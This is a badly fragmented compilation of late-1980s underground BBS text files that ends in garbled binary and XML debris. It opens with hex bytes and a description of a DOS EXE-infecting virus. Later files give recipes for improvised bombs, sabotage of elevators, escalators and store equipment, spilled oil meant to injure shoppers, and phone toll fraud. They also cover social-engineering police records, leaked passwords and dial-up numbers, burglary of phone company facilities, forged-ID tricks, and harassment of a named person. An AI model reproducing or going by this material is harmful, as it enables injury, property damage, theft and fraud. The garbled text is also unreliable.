E9 B2 E9 7B 92 B6 2D CF 23 8E 04 A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10  8B 1C A2 04 B8 8D 04 B9 73 04 89 45 1A A1 EB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20  89 45 14 A1 E5 04 89 45 17 BA 02 41 CF 23 8B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30  E9 04 BA 03 41 31 CB CF 23 BA 02 3F CF 23 7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40  A1 E7 04 B6 3D 89 1C E7 04 BB 00 02 B8 EF 0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50  23 B6 3C 89 1C E7 04 CF 23 89 1C EF 04 83 F9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60  00 77 0D B6 18 8C 1C A0 04 89 14 A2 04 CF 23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70  77 FD B8 8D 04 BA 00 3F CF 23 A1 E7 04 EA 9D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80  BA 03 55 89 1C E7 04 89 0C E5 04 89 14 EB 04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90  23 BA 03 41 89 0C E9 04 B8 8D 04 CF 23 B6 39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A0  46 04 CF 23 B6 39 B8 A7 04 CF 23 BA 02 4E C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B0  4F 61 43 64 67 67 22 75 70 6D 76 67 22 55 6A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8C0  6E 67 23 23 23 23 23 23 1A 1A 1A 1A 1A 1A 1A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only infects systems running DOS 3.0 and up.  It is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infect disks with more than two directorys.  When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ll seek out the first EXE file in the second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 Each run after that will begin infection of files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jump from directory to directory when executed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fected EXE file to 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Friday of the month the virus will display a full colo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Vmag Issue 1 Volume 1                                               0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light on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al on vir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 on Whale and if I can find it Wha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viruses, more source code and more ins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Anarchy Stuf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 I don't really feel like writing much about anarchy, bu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with some cool screen captures from RIPCO BBS - thank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BBS.... anyone know the number to RIPCO 2?  E-Mail m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dited copies taken from RIPCO BBS for your viewing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NTO A R-RATED MOVIE IF YOU'RE UND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  In 1968 the MPPA, headed by Jack Valenti started the Code A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which would rate pictures on sex, violence, swears, nud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In 1970 any picture depicting sex, whether it was pornography or not, got an X rating.  That has changed.  Also the PG rating until 197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M.' There used to a PG rating and then there was a PG 'tag'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bined the two so that PG and PG tag were just 'some material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...' Also until recently less than half the theatres re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ng and didn't let anyone under seventeen.  The other theatr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 or didn't follow the suggestion.  That's what the rating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 suggestions or guidlines for theatres owners.  Now, most thea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hain, follow the R-rating.  Some do not.  Other theatres do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ime.  In 1970 you would walk into an X rated movi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ORK ORANGE and not cause a fuss.  Theatre policies have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40-50% of all movies since 1968 have been rated R.  No on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an R picture might contain, which is a major draw back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tings to inform parents who have little kids. They rat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icit because I don't know why the fuck a picture gets an R -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it's an R.  But let's not discuss that.  The best way to p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ating system if you are under 17 is to beat it.So all you gu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big and are 17 or older, well, i guess you can press the space ba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out us "under 17ers" by reading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THE OLDEST TRICK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go to the Old Mill, Sunnyvale 6, etc where they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atres, it's very easy to walk into any picture you wan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ticket.  First of all do not walk in an empty theatr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 in.  Ushers sometimes come in.  Buy a ticket for a movie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the R-Rated thing you're going into.  Then 2 minut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ll theatre, discreetly leave and just walk in and sit next to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protection near the fron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ovie theatres are easier to switch theatres than others.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like most and take advantage.  The UA 6 is hard because the thea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to avoid night showings At some theatres there are more usher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find scout the place first and see if it looks cool. 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atre complex, you won't have that many problems with ushers.  Matin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ends are better.  Weekdays maninees are great because almost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atre so most of the people working there don't pay atten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inly judge the situation and take advantage anytim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, go to a favorite theatres of your choice that you ha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ovie you go to, save your ticket stubs [if they don't do tho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] Save up a few ticket stubs with the little numbers on it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gram schedul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The Ticke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have ticket stubs wheatre.  Say the program schedul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is playing in the theatres which produces ticket stub #6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ub if you get any trouble!  Sometimes if you go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office at a six-thater complex there is a machine for each ticket #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aying the movie.  So the ticket seller goes to that box so h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cket.  So if you can figure out which movies produce what #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i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 - the worst they can do is give you your money back if the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you out, but they will most certainly not do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.  They will just make you go back where you came from.  Say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waiting in there - then if you have the right stub go sit n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 It's all a matter of keeping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 I just walked into Breakfast club and half the theatre wa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nuck in and did the same thing.  It was pretty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THE "BUY A TUB OF POPCORN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chnique is a good one and it works almost risk-free.  Find and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eeing the same movie who looks around 20-30 and is cool.  Ask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you into the movie and "be your parent" and you will buy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 of popcorn.  Sometimes you can offer other things, or sometim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free because they might have tried to get into movies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7 too and will have sympathy.  If worse comes to worse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eatres like the fine arts where the managers are bithces and they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your REAL parents, say that your parents went of to TANZANIA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hat's taking you in is your legal guardian for 1 month while y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.  Also if your 13 and you are SEAN ALVES, have the guy that's taking you in say that you are 11 so you only have to pay 2.5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The forged I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n-AMC, UA or chain owned theatres sometimes ticket-sell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.  At the AQUARIUS in Palo Alto they don't care how old you are...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 SQUARE it used to be I could go to R-rated stuff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ir policy.  It's not gonna hurt if you try, so go for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uck out.  Many theatres which are 'revival houses' don't give a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ovie is so you could also try there.  If they do ask fo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ell them you don't drive.  Bitch and make up some excuse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didn't want you to get your license until you were 17, or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ident.  Remember:  A 14,15,or 16 year old can look old enough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So, since you are 16, and you have a drivers license don'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ecause it says your sixteen! Show them something else which you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Anything that tells your birthdate but hike it up a few ye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ospital card for I.D.  You could probably think of millions of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like a legimat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y can't do anything to you - just play it cool and m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why you didn't drive "A FRIEND DROVE ME" "I HAVE AN EYE HANDICAP"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BUSTED" etc etc.  The ticket sellers douing with you, you say you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y say your wrong.  They'll probably g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A last resort - the b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17, and think you can pass it, you have to have a good wit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tional skills and be able to make a scene.  You must convi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in line and the ticket seller that you are old enough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trusty "R-rated busters" bitching his way through yet another f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GOER: 1 to R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ELLER: I.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: Why do I need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 [mechaniclly]:  it's rated r - no one underseventeen adm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anied by an adult or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[looking pissed]: I don't have any I.D. I didn'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: I'm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[turning around to get other peoples approval]:  Well I'm sorry. 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lieve me, I'm seveteen.  I DIDNT THINK THIS WOULD HAPPEN!  [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] I usually don't have problems with this theat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: Don't you have a drivers li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eople in line are getting pis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: [fast] LOOK!  MY CAR BROKE DOWN YESTERDAY AND A FRIEND GAVE ME A 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AR!  I DIDN'T BRING MY LICENSE BECAUSE THIS THEATRE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ME A BAD TIME!  DAMMIT!  THIS IS REALLY PISSING ME OFF!  LET M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one from the crowd trys to save your ass "LET 'im in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OKAYOKAY...just....just...don't you have any other I.D.?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[innocently] : Only my word of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seller presses the button and a ticke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- this is only a last resort.  There are much better wa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neaking in at cineplex's and the popcorn tub routine at thea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only one show.  The bitch routine may work and it may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orged I.D., look old enough, and make up a good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rivers lisence that's the ultimate - you might even pas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movies but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member - being under 17 doesn't mean you'll never get to see REV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JA or PORKY'S IV - protest the r-rating!  What the hell d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atings for?  Who really knows if in the movie they're just saying 'fuck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times or the movie should have been X-rated!?  Who knows?  Exce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titutional right to freedom of speech So, take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.  Sneak into an R-rated movie.  Buy a beer from the 7-11. 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tion and the right attitude, you could be older than you thin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R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S Stop/Start] [Spacebar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's License Fingerprint and Document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/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e Driver's license/ID issuing authorities in the 50 US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ct of Columbia, and 11 Canadian provinces and found only 4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a fingerprint was required .     Thes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(r thum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ado (r inde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waii (r thumb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as (both thum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n few!  Of course the people I spoke with were just that. And you gno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...  Then again,DMV employees do seem to act like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document requirements most states want to see a birth certificate,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husets,which will accept 3 various pieces of ID, and Vermont,in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by with a Marriage License (or divorce papers). Some however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n addition to the BC.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  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  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   SS card and 2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 SS c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  SS# and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  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a         2 pieces(1 w/sigature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na     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          1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gan        2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    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1 piece w/sig,1 w/address(can be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         SS card or 2 docs w/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 1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   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  1 piece w/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      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       1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 only Ontario affirmed that anything other than a Birth cert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and that is mearly 1 additional w/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source of info about IDs is The Drivers License Guide Co. in Red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CA  800 227 8827   Try and get the US ID Manual. It's a hundred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alk sweet they might give you 30 days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it, see you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PARABOLIC MIK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ll Lunatic Labs Ult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415 278 7421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&gt;415 278 7421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co] Which 1-281 ?=menu,&lt;CR&gt;=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S Stop/Start] [Spacebar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scellanneous Anarchy And The Li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____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brought to  you by The Elixir Greedy Corp. @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on anarchy. The author tak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 writing this. It is for informational purposes onl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ain some hacking data. Read on...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+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=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===================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Written By Elixir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===================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ailing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icapped persons sometimes get free mailings when they place the phr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tter For The Handicapped" in place of the stamp. This should work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for 'free' mailing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brosia [ P.O. Box 2511, Bellingham, Wash. 98227-2511 ] has issues 1-91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 in addition to supplementary materials. It's $ 80 + $ 2.50 (s&amp;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=+=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ertronics [ 2011 Crescent Dr. PO Drawer 537, Alamogordo, NM 883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es mostly box plans, automatic teller machine weaknesses, home-ma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, frauding devices, and a bunch of other goodi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g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ever want to seek revenge on someone, here are some tips. Plac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newspaper 'giving' away free stuff i.e. 3,000 green stamps.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re phone number along with whatever bogus info. you make up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such as 'house for sale'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o to the library or another place with lots of magazines and pu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cards. Fill in their info. and mark the '[] Bill Me Later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.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Call up Com Ed and tell them to cut off the utilities because you'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ay on vacation. Do this for the phone als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your victim goes out of town, send a telegram to his bos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 a better job and is quitting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Go to his post office and fill out the handy-dandy 'Change Of Address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Either temporary or permanen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Code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passwords for the Dow Jones News Service. It is acc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elene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9J6UF5226 , TSR8003WL7 , TSR80C8KIZ , TRS804F623 , TRS806708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Stor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a ready-made excuse/explanation/alibi for your ac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, claiming stupidity worx bes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=+=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this you need a magent. Head for the clothing section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tag. Run the magnet over the magentic strip. Doing thi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it so that the cash register won;t be able to pick it up. Do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st of the shrits, pants, blouses, etc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ith a small screwdriver, find a drinking fountains. It should hav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ling system. Underneath, remove the cap on the valve near the larg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lant. Poke the valve that looks bicycle-type until some air is suck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ystem. The compressor will make some strange noises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or will be destroyed within a few minut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 the restroom, turn the inlet valve on the toilet flusher to full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have a cap on it but it can be removed. Now, take about 7 feet w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oilet paper and flush it down the toile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ake apart the little inventory control (beige in color, round at one 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s apart. You will see a little copperish-looking foil peice co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green plastic marking, "Inventory Control - Property Of The Stor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is plastic is the whole mechanism. Ta     person's bags, pockets, &amp; 'give' it to a kid. When the persons exi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they will trigger the alar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he store has a hardware department, find a canister of methyl acetal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niene. Make a hole at the top of it. This action will eith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sion or emit a really bad smell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ind one of those large brass disks on the floor. Stand on it and turn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r-clockwise [unscrew it with your body]. Inside you will see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very think wires. These are serial bus wires. Strip them and conn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If you're lucky, you'll probably knock out all of the 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ssions from each register to the main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or Phu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the switch [Emergency Stop Button] and turn it off. This is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s lots of laughter because most people don't know how to work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Also jam on of the buttons ( the highest floor produces the best effec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paper, gum, tape, etc...The elevator will always proceed to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or level when not being used. Or better yet, do this to all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vators ther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ith some non-transparent opaque tape find the photosensor on the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, and cover it with the tap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Gather a bunch of anarchists together. Get all of the elevators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or, and push all of the buttons on every elevator. Take the stair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h the phun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lator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 the base of the escalator there are some buttons. "Fun Switches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one that reads, "Emergency Stop". It should 'unbalance'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and unstable escalator passenge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l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In the main lobby of most big hotels there are house phones. Call every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tel to tell them that there is a problem in the databas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should come down to the front desk and reregis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able; The cable boxed which u    front desk are easily picked with a paperclip. Also, you can go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d's laundryclosets. These are sometimes locked but now and then you'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a few that have been left open. Then you can borrow someone else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le key. Another kind of cable unit frequently used in hotelroom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ind that bills you automatically once you select a channel.  G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n, and try to find the set of dipswitches in the rear of the u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ells the front desk which room to bill, and have phun at a fell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pant's expense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Order food to another room while the occupant is out ( Remember that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maid's master key so you can enter the room as you please.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o tell him to add a generous tip onto the bill. Your vic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recognize anything amiss until he checks out. You can order ro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 for every room on your floor, but most hotels can detect whe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 is coming from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Spa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auna at your "favorite" health spa, a quick, easy, &amp; entertai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of clearing out the sauna is pissing into a bottle or a canist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ort, and pouring it onto the rox. The heat then becomes unbear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mell is terrib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e Substitut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 3 parts alchohol, a half of a part of salt, and a half of a par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Canister Bomb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Co2 canister and cut the top almost off but leave a litt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a hinge. Let out the Co2 and insert a M80 into it. Insert f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t hole in top. Close the top by welding or epoxy glue.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 to ignite just ligh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able Explosiv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 solid Nitric Iodine with househould ammonia. Wait overnigh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ry till it hardens. Ready to throw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Jug Bomb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glass jug, and put 3 to 4 drops of gasoline into it.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p on, and swish the gas around so the inner surface of the ju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ated.  Then add a few drops of potassium permanganate sol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it and cap it.  To blow it up, either throw it at something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ll it at something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denberg Bomb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Ballo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Bott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Liquid Plum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Piece Aluminum Foil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Length Fus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the bottle 3/4 full with Liquid Plum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uminum foil to it. Put the balloon over the neck of the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loon is full of the resulting gas.  This is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. Now tie the baloon.  Now light the fuse, and let it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use contacts the balloon, watch out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 Broadcasting Company (NBC)                   312.861.7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C I Electronic Mail                                 312.856.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net Comm. Corp.                                    312.443.1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versity Travel                                     312.667.6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chor Plan (Insurance)                               312.693.0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net                                               312.938.0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and Park Bank                                    312.432.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 Corp.                                           312.922.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-2400 Baud- (Try midnights)                  312.346.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known  -1200 Baud-                                  312.369.439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-1200 Baud-                                  312.726.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-1200 Baud-                                  312.945.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-2400 Baud-                                  312.983.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issile Base                                     505.678.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Union                                         914.682.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onal Defense Systems                              619.     Pentagon                                              202.553.022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tagon                                              202.697.08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tagon                                              202.653.10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York Univ.                                        212.777.760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thwestern Univ.                                    312.492.309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University                                    617.732.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University                                    617.732.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ton Univ.                                        609.452.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C I                                                 617.267.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                                            617.861.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lastic Aptitude Test Mainframe                    203.288.8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C I                                                 212.363.80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omputer company                                 402.345.6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Bioaccess Systems                       415.323.21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Force                                             800.544.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Link                                             800.325.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C I   Electronic Mail -300 Baud-                    800.323.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/ Import [After 6pm]                           800.424.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of America                                       800.223.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lo Park Corp.                                      415.361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l Avaitions Administration?                     202.347.3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+=-=+=-=+=-=+=-=+=-=+=-=+=-=-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 Telenet Host Computer Access +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+=-=+=-=+=-=+=-=+=-=+=-=+=-=-=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eleNet [ 312.938.0600 ] you can access thousand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thousands of numbers just by dialing one and accessing the hos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er through ther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NE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= D1 [return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[command sign, waits for you]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s computer addresses are six numbers to seven numb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's what to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c 2020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you have to enter a 'c' 1st. Stands for conn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host computer acces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2201 [ Cserve ]                                                          277307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734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2459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1745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17543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11224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4789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220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get the format and the ide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Departmen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==- -==- -==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arge-city police departments have computer database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to access. To do this, call up your police department [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! ] and ask for the communications department. Ok, this guy is very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told about people like you. Although he doesn't ge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, so don't screw up! He is looking forward to phone calls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out to make. This department cannot trace your call. Although '91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ut this is totally different. To put it into simple words,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rrest you. Yes, I know this is the police, BUT this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divis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you have yo do here is find out there modem number.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they have records on what you did last week to that house on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 all sorts of 'goodey!' records. This guy will give you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"send over some criminal records" only if you give hi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1] A high-ranking official's name who gave you permis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2] You file on the crime has to be a voilent crime or just a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relating to any specific cri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3] Your star numbe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4] Ranking ( please, don't pick someone with a low ranking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5] District number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tice this routine many times in advance. Also, getting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together beforehand also helps. This information is no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. Just talk to someone at some desk the next time you 'visit' the jai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 for more ]{00l Productions by ...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=%=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@ 1989 Elixir Greedy Corpora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vision O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Hades Intn'l Cor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=%=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co] Which 1-281 ?=menu,&lt;CR&gt;=ab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S Stop/Start] [Spacebar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Just do it"          HOW TO FUCK UP WORK    "Ask not what Anarch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-NIKE                 VOL I.            can do for you, b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what you can do f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yped by: PUBLIC ENEMY            Anarchy"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Association with: THE ANARCHISTS ALLIANCE       -Public Enem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Mark B. you are a total dickhead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: Jul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mated 80 Columns because I felt like it, da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was written while I worked in a grocery store for som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.  Being fired was an honor, believe me.  Anyway the Anarch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 this article are tailor-made for a grocery store, howeve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iques can be used or modified for use in other types of work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your imagination.  You'd be surprised at what can happen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want to fuck up work, huh?  Either you about to get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a dick, or you just hate the fucking place.  Whatever you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cking up work is, read on for some Anarchy info that will re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to hell an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who has worked in a grocery store knows that there'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ake free calls to for deliveries, orders, etc.  Some fu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is is to go to the phone when nobody's looking, dial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numbers and put a pencil or some tape between the phone and the recei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sen't hang up when you put the handpiece down. After a couple of h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pick it up and the company then owes about $500.00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harges.  Another idea is to tape the phone to the loudspea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o that the listening part of the phone is taped to the speak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ex number and run.  Soon the voice of the sex line will go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!  Other fun things to do with the phone is to make deliv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houses, order pizzas, prank people, and send shit to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If you really want to fuck them up prank 911, prank the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puter systems that trace.  Probably the best way to fuck them u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part the phone and cut the wire that makes the phone ring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ut nobody will be able to make an incoming call.  This could re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 to hell because no deliveries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rk in a grocery store, you know that there are refi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s for ice cream and frozen shit.  O.K. what you do is you get some Cr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oil and pour it along the aisles right in front of the refrig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Now when somebody leans over to get something they slip and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igerator.  Me and my buddy Frank did this once and some old la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the aisle.  She reached over the side of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and fell right in it!  I couldn't stop laughing for a week.  It too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to pull her out and she sued the place.  It was great. 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do is to take bottles of vinegar and barbecue sauce and dro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sle and take off.  You can smell that shit all over the store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ean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up to the deli and order about 3 pounds of fish.  Just say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.  Now when nobody's looking stick it way up a cash register o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n aisle.  In about 2 days the place will smell like somebody d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 has radiators or heat sources, take a carton of cream and ope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 the the radiator.  It will smell like somebody shit and it will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over the store!  This is a great way of discouraging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lots of fun in the supply room of your store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t night and get a carton of eggs and throw them all over the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ies.  That's about a couple hundred dollars loss because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lean off the eggs and they will have to trash the grocer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your store there is an electrical box that contains all of the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ctricity.  Put a C02 cartridge bomb or and M-80 and run.  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he lights and power will all go off in the store and then it's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My friend did this once and when all of the lights were off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FIRE!  It was total chaos!  And all the meats and frozen shit mel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icrowave in the break room, put a can of soup in and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 minutes it will blow up the whole microwave and put shrapnel and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break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t's about time to wrap up Volume I. of how to fuck up work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 a guideline and incorporate your imagination into this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s happen when you put your mind to it.  Do shit like call i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or say that you poisoned an order of food (make sure you do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) or if they stick you outside and you see one of those huge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ack out, stick a cart behind it.  Good luck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of the workers who helped make my dreams come tru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d our grocery store to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se cool boards d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STRONGHOLD: 1-201-226-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ROACH UNDERGROUND: 1-806-794-4362 PW:THRASH  NU:ASPHY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LIGHT BBS: 1-319-332-8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ouffard you are a dick!  Anybody out there that hates people who l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, and fuck others over, prank this dick at 1-216-261-0788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, call still. Believe me it's worth the effort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ly greatful to you for fucking this dick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: PUBLIC ENEMY with the ANARCHIST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am hereby not responsible for what you damage, rape, mutilate, d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, scalp, kill, crush, manhandle, dick or fuck over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pco] Which 1-281 ?=menu,&lt;CR&gt;=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B/O/B B/O/B B/O/B B/O/B B/O/B B/O/B B/O/B B/O/B B/O/B B/O/B/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               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The Boys of Black Present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               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How to Raid Your Local Bell Telephone Repair Station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               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Written by ZeroPage  November, 1989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               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Call the BOB UNIX at (214) 760-7380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               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To Login type: UUCP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Then at the $ prompt type: cd ...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Then type: BBS or CHAT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                                                             B/O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O/B B/O/B B/O/B B/O/B B/O/B B/O/B B/O/B B/O/B B/O/B B/O/B B/O/B/ B/O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my next file; How to Raid Your Local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tep in making a raid on any Bell office is finding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bigger the metropolitan area, the more repair st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king.  Repair stations are usually situated within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areas.  If you don't know where any are, here are two way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Call your Bell service representative and tell them that you ar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ing your bill, and you would like to know where to go to p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erson.  Take dow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Drive around in neighborhoods until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rprisingly, this works, I know of at least 5 I have found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location or address, you must determine if it is a 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station.  This is fairly simple.  The following are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for a CO (Central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s usually 2 stories in heigh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lly has a weird shape, resembling an inverted L atop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peer within the windows you will see rows of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ear the door entrance is a security keypad and door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feel you have found a CO you will just have to wait for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for a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mall one stor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lly has a rectangular shape. (Longer than is w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tended behind it is some form of fence enclosing a pa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ften a large car port behind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15-30 Bell Vans, Cars, and Tr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a suitable repair station you must prepa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equipment I have found to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of gloves.                     (This is a mu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ug, dark clothing.                (Be sure your cloth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tted, loose garment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get snagged on barbed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flas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bar or tir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e-Talkies                      (Optional, but nice to h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t Cutters                        (O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ves are obvious, you do not want your prints spread all over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wear well fitting clothes, blue jeans and a dark t-shirt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will be jumping a barbed wire fence, and it makes it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bag is useful to put things in.  Once inside you will find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 and paper-stuff that can get quite awkward to carry. Put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thing to go for are roll-a-dex and other phone-pads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ese on their desks and they contain lots of goo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is useful for seeing in the dark.  Be sure not to poin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bar or tire tools.  Sometimes the doors to the building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 easy to defeat with a crowbar.  Either jimmy the lock or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Use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e-talkies are useful if you and your partner are going to be i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office, letting each know whats going on i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t cutters are good for cutting the lock on the gates,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lk or drive your car right in, then shut the gate an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.  Also, if you are going to be carrying heavy equip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AX machines, or Computers) it is much easier to cu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te than it is to drop the equipmen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cutters are good because a lot of the time the fence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chain link, just cut a hole near a bush.  Sometim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nce is made of brick.  So that won't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1am some night, (by then all the employees have gon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ighbors have gone to sleep) and either walk o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.  I suggest you drive.  When you get there park the ca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nd walk the rest of the way.  There are 4 ways you can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tion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row the stuff over the fence and then climb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ide in a bush and cut a hole in the fence and then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ut the lock on the gate, open it, go in,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row the stuff over the fence and crawl in und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lot of the time the clearence between the bottom of the f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nd is enough to let even the fattest of criminals g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side the fenced area, here i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once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: If the primary purpose for your visit is to get into the tr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  Obviously, check all the doors and window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 vehicles do not have alarms,  I ha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, but I have seen it.  On the trucks all the doors a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ingle lock, merely cut it off with the bolt cutters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r, and all the doors will unlock.  The lock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back, left or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you can usually find handsets (beige boxes), phones, tes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 mean the NICE kind) and other assorted odds and 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tuff is insid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: If you are going for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facing the back of the office, and will se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3 to 5 doors.  Most of these are unlocked, but I'm s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do lo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oom in the station has an exiting door, so that is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 many.  Check each door and if you find one unlocked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.  Once you get in look at the door and decide if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n alarm on it, if it does, get out.  However, a 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 an alarm in a bell station.  If the door happens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prying it with the crowbar, if that doesn't work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sh the glass (which you will have to do in most cases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my it, OR, if you are lucky, the room you want to ge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e one that is interconnected with another,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n a moment.)  Here is what you might fi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or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room is contained extra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und manuals, mini-tv's, radio's, first-aid k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ves, helmets, jumpsuits, phone lines, etc,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Bell odd and end, in the st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rea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break room, they ALWAYS have a coke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ffee-machine in there.  I usually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sewat by then, so what I do is this:  They have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with change in it, they are supposed to put a d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ime they get coffee.  I just take the chang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cents in the coke machine and take it easy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.  There is almost always no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TY &amp; Prin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mall room that contains a TTY and Printer (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TTY) these were both made in about the 18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too outdated for any phreaker/hacker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the printer is connected to a damn-nic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o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where they come for assignment, there are de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ere, get the roll-a-dexes! There arew DOZENS of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ing everythings from COSMOS to USOC.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Order Code).  They also have portabl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rs here, they are easy to bust into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ually get into here from the break room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OTHER door at the other end, somY{times t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asily movable locker in front of it.  The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to the MAIN office (the one that is usual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A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layroom.  Here is what you can get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Machines (If you can carr� it, TAKE IT, I d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R's -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s (The normal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best of all, and what I am using to create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 supersPORT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portable, 640k. Backlit LCD, 2 3.5 drives,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, internal HAYES 2400 baud modem, FULL siz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te those piece of shit with 10 columns and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adio Shit, you S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they are damn nice, fully IBM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*love* mine.  They usually have 2 or 3 of thes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and your friend dont have to figh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ny of this stuff you want. A word about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ords are contained  in A. manuals sitt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mputers, B. on the syst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grab the manuals sitting near the computers,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(hope the software is in it), or just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(check in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on disk, it is contained within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ry commodore, IBM) load it up on an IBM,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hone, (so it wont dial out), and copy dow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des for later user.  It will dial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ccess number, (COSMOS or LMOS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ords.  Usually via MICROLIN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your goodies, how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ut the lock on the gate, go out through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ut a hole in the fence, go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mped over, let a friend go over first, then hand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is has been an informative tutorial, thos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 are the ULTIMATE hacking machines, believe m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d true methods here, I use them, I kn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a station is merely common sense and the lack of Bell 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lieve how simple it is.  One place was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lice Station, I was in it for 3 hours, did I get caught? Hell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y next file, Raiding your Local CO, and how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uters, phone lines, and other phun phone stuff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O/B -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for the hell of it, I'm going to make this file 3000 lin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��� �� �  ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ܰ�������������������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�����������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>۰� �����۰�������������۰�������������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</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>۰ ۰����۰���۰��������۰�����������������</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ޱ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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ܰ����������������������������   �߰����۰��������� �� ۰����۰�۰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۰�����������۰�� ��� �����۰��������۰���۰���۰��۰���۰�ܰ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۰����������۰�۰��������� ��������������۰����۰��� ���۰������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ܰ��۰�����������۰� ���۰�����������������</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ݰ ����������������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>۰</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>�������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۰�� ����������۰� ������ ����� ް������۰�ް��������������������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۰� ܰ����������۱� ް�����������������۰� ��������������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  �� ܰ�������� � ް��������� ް������۰ް��������۰����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ܰ�������� ���� ��������� ܰ�����۰� �� ް�������۰�����������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ܰ �������� ����</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ݱ�������������� ��ܰ� ܰ��������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>۰</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>���������������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۰�� ��� ް���ް�������������������������������۰����������������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 ��ܱ���ܰ�������߱����������������������� ����߱��������������� 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޲</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>���������    ��  ���������������������߱���� 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ܰ� ۲�����   ��߱����</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>޲</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>��������������߰����   ��߱��� ����������� ܰ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ް� ������  �����  ߱��������������߰�    ��߰����   �߱� ���۰�� �� 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�� �   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>޲�����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>۲</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>��������   �����߱���������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>۰</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>� ܰ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߰۰��   ��� ����ް�� ����������۲�����������    ��  ߱������۰ް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 � �� �������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">۲�������۲� ���ް� ���� </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>޲����� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>۰</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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ܰ�� ������������������ ��۲����������� �� �߰��� ܲ����� ��۱� ߰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۰�  ������������������ ��۲���������������������ܲ�������� ���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���������� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>߲���������������������۲�������� ܰ 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ް������������������� ����������������۲�����۲���������  ܰ�</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>޲</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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۰��  ����������������������������������۲��������������� ���۰� ���� �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 � ���������������� �� �������������۲�����ܰ��ܲ��� ����۰</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ޱ</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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ް�� �������������� ����� ����������۲�������۲���� ����۰� ��  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۰�� � �����������������������۲���� ��۲���������۰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۰� � </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ޱ� ���������� �  �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>۰</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>� ���������������</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>۲</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>�ޱ�� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>۰</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t xml:space="preserve">� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>۱</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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ް۰� ��� ���  ��������� ߰�� ������������������ ܱ��ް���۰� ��ް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���� ް������������������������� ��   ܱ����������� ��ް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۰ܱ��ް���   �������������������ܱ�����  ް������  �� � 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۰� ���� �� ��������������ܱ��������� � ������  ��۰���� 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ް��� ����� ��� ��ܰ�������� ��۰� ��������    �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ܱ�  �� �� �� �� ����߰���������۰��� � �������� �� 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ܰ����� ��  ����� ߰�������ܰ����� ������ �� ������ ����۰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ܰ���    ���� ް� ������ ��߰��۰����� ������������ �� ����� ް���۰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۲�  ߰� ������������������������������� ��� ����� ް����۰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۲��� ���� ������������������������� ������ �� �� ް�� ��۰����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۲������� �߰������� �������� ������۰��� ��  �� ��� ��� ��۰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۲����� ���������� ������۰�����۰����� ����� �� ��  ��� ��� �۰����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������ ������������������������������������ ��� ��  ��� </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
        <w:t>ޱ� �</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>۰</w:t>
      </w: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��� ��  ���� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>۰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۲����������������������������������������  �  �� �  �� � �۰���� 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 xml:space="preserve">۲��������������������������������  �  �� � ��� � �۰���� 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۲������������ �������������������� ��  �� � ް��  �۰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۲��������� � ���۲����������������� ��  �� � ް��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۲����������� ���۲������������������� �  � �� ��� ���۰��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۲�����������  ��۲�������������������� �� �� �� ް� ������� </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rtl w:val="true"/>
        </w:rPr>
